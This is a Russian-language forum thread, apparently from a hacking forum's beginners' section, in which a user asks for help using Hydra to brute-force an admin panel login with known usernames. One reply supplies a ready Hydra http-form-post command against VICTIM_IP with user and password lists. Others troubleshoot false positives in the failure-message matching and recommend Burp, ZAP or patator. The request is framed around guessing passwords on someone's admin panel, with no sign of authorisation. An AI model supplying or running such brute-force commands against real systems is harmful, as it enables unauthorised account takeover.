Помогите составить команду для Hydra

Discussion in 'Песочница' started by HASARD, 2 Mar 2019.

  1. HASARD

    HASARD New Member

    Joined:
    27 Feb 2019
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Добрый день, помогите составить команду для Hydra (Windows), логины известны не получается составить форму для подбора пароля под данную веб форму

    <body class="page-login"><main class="page-content"><div class="page-inner"><div id="main-wrapper"><div class="row"><div class="col-md-3 center"><div class="login-box"><a href="" class="logo-name text-lg text-center">Admin</a><p class="text-center m-t-md">Admin panel login</p><form id="login-form" method="post" class="m-t-md"><div class="form-group"><input type="text" name="username" placeholder="Login" required class="form-control"></div><div class="form-group"><input type="password" name="password" placeholder="Password" required class="form-control"></div><button class="btn btn-success btn-block">Login</button>
     
    #1 HASARD, 2 Mar 2019
    Last edited: 2 Mar 2019
  2. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    220
    Likes Received:
    117
    Reputations:
    13
    А form action и текст/исходник страницы после неудачной попытки авторизации где ?

    Вот пример, у Вас будет что-то похожее -

    hydra VICTIM_IP http-form-post "/form_login/dataReceptor.php:username=^USER^&password=^PASS^:Bad login" -L users.txt -P pass.txt -o hydra-http-post-attack.txt

    P.S.:
    Гораздо полезнее и проще будет записать request-response при проверке пароля Burp-ом или OWASP ZAP-ом, и выложить сюда body|headers.
     
  3. HASARD

    HASARD New Member

    Joined:
    27 Feb 2019
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    После неудачной попытки

    <body class="page-login"><main class="page-content"><div class="page-inner"><div id="main-wrapper"><div class="row"><div class="col-md-3 center"><div class="login-box"><a href="" class="logo-name text-lg text-center">Admin</a><p class="text-center m-t-md">Admin panel login</p><p class="alert alert-danger">Incorrect login or password</p><form id="login-form" method="post" class="m-t-md"><div class="form-group"><input type="text" name="username" placeholder="Login" required class="form-control"></div><div class="form-group"><input type="password" name="password" placeholder="Password" required class="form-control"></div><button class="btn btn-success btn-block">Login</button>
     
  4. HASARD

    HASARD New Member

    Joined:
    27 Feb 2019
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Подбор как бы запустил но гидра находит не верные пароли к логину и пишет их в good.txt
    Что то не так делаю =(
     
  5. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    220
    Likes Received:
    117
    Reputations:
    13
    Скорее всего, ответное сообщение о неверном логине/пароле не так анализируется.
     
  6. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    вебформа - юзай пататор, либо напиши сам, гидра для байтоёбства ssh/ftp/smtp/etc
     
    _________________________